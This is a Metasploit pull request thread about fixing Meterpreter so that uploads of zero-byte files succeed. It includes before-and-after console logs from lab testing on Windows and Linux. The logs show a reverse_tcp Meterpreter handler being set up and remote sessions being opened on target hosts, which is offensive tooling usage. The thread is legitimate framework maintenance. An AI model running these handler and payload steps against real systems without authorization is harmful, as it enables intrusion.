handle zero-byte reads and writes gracefully

[bcook-r7]

When writing to a file channel, it is possible to open a file and have an implicit '0' byte write. For instance, when opening an empty file open, like so:

  ::File.open(local_file_name, "")

or 'touching' a file as in write_file("meterpreter-test", "") in test/modules/post/test/file.rb or uploading a zero-length file.

Steps to reproduce/verify

Before:

$ touch hello
$ ./msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(handler) > run

[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...
[*] Sending stage (787456 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.1:4444 ->
192.168.56.1:55621) at 2015-01-27 11:23:09 -0600

meterpreter > upload hello
[*] uploading  : hello -> hello
[-] core_channel_write: Operation failed: The parameter is incorrect.

After:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(handler) > run

[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.56.10
[*] Meterpreter session 1 opened (192.168.56.1:4444 ->
192.168.56.10:49833) at 2015-01-27 11:26:03 -0600

meterpreter > upload hello
[*] uploading  : hello -> hello
[*] uploaded   : hello -> hello

[metasploit-public-bot]

Test PASSED. Refer to this link for build results (access rights to CI server needed): https://ci.metasploit.com//job/GPR-MeterpreterWin/141/ Test PASSED.

[OJ]

Processing shortly!

[OJ]

Before

Windows x86

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.1.10.42
[*] Meterpreter session 18 opened (10.1.10.40:8000 -> 10.1.10.42:59130) at 2015-01-28 15:08:54 +1000

meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > upload /tmp/empty C:\\temp\\
[*] uploading  : /tmp/empty -> C:\temp\
[-] core_channel_write: Operation failed: The parameter is incorrect.

Broken!

Windows x64

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Sending stage (972288 bytes) to 10.1.10.42
[*] Meterpreter session 19 opened (10.1.10.40:8000 -> 10.1.10.42:59134) at 2015-01-28 15:11:35 +1000

meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
meterpreter > upload /tmp/empty C:\\temp\\
[*] uploading  : /tmp/empty -> C:\temp\
[-] core_channel_write: Operation failed: The parameter is incorrect.

Broken

Linux

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1142784 bytes) to 10.1.10.40
[*] Meterpreter session 20 opened (10.1.10.40:8000 -> 10.1.10.40:54001) at 2015-01-28 15:13:20 +1000

meterpreter > sysinfo
Computer     : ropchain
OS           : Linux ropchain 3.14.23-100.fc19.x86_64 #1 SMP Thu Oct 30 18:36:00 UTC 2014 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > upload /tmp/empty /home/oj/empty
[*] uploading  : /tmp/empty -> /home/oj/empty
[*] uploaded   : /tmp/empty -> /home/oj/empty

working

[OJ]

After

Windows x86

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.1.10.42
[*] Meterpreter session 21 opened (10.1.10.40:8000 -> 10.1.10.42:59251) at 2015-01-28 19:41:56 +1000

meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > upload /tmp/empty C:\\temp\\
[*] uploading  : /tmp/empty -> C:\temp\
[*] uploaded   : /tmp/empty -> C:\temp\\empty

Working!

Windows x64

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Sending stage (972288 bytes) to 10.1.10.42
[*] Meterpreter session 22 opened (10.1.10.40:8000 -> 10.1.10.42:59252) at 2015-01-28 19:43:10 +1000

meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
meterpreter > upload /tmp/empty C:\\temp\\
[*] uploading  : /tmp/empty -> C:\temp\
[*] uploaded   : /tmp/empty -> C:\temp\\empty

Working!

Linux

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1241088 bytes) to 10.1.10.40
[*] Meterpreter session 23 opened (10.1.10.40:8000 -> 10.1.10.40:55237) at 2015-01-28 19:46:41 +1000

meterpreter > sysinfo
Computer     : ropchain
OS           : Linux ropchain 3.14.23-100.fc19.x86_64 #1 SMP Thu Oct 30 18:36:00 UTC 2014 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > upload /tmp/empty /home/oj/empty
[*] uploading  : /tmp/empty -> /home/oj/empty
[*] uploaded   : /tmp/empty -> /home/oj/empty

Still working.

Looks good to me. Landing.

[OJ]

Is it worth doing another build and release of the binaries at this point? Or should we wait for more stuff ?

[bcook-r7]

Let's wait a little while - working on more stuff in the mean time.